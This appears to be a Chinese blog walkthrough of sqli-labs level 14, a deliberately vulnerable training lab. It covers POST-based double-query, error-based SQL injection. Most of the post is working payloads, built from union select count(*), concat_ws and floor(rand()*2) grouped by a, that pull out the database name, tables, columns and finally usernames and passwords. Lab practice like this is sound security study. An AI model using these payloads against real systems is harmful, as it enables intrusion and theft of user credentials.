sqli-lab(14)

Posted 2021-12-05 -zhong

POST型的 双注入

0X01随便测试一下

在password输入"会报错  "#就不报错了 那么应该是“”的闭合

但是没有回显的值 只有报错的信息 那我们是不是该考虑从报错的语句里面来得到我们的答案

0X02爱之初实验

爆库名

" union select count(*),concat_ws(‘*‘,(select database()),floor(rand()*2)) as a from information_schema.tables group by a#

有数据库后 开始爆破表名

" union select count(*),concat_ws(‘;‘,(select table_name from information_schema.tables where table_schema=‘security‘),floor(rand()*2)) as a from information_schema.tables group by a#

limit绕吧 这是不是个数问题 不能用group绕

" union select count(*),concat_ws(‘;‘,(select table_name from information_schema.tables where table_schema=‘security‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

得到表名后

爆列名

" union select count(*),concat_ws(‘;‘,(select column_name from information_schema.columns where table_name=‘users‘ limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#

last 爆破字段 --第一个用户名和密码

" union select count(*),concat_ws(‘,‘,(select username from users limit 0,1),(select password from users limit 0,1),floor(rand()*2)) as a from information_schema.tables group by a#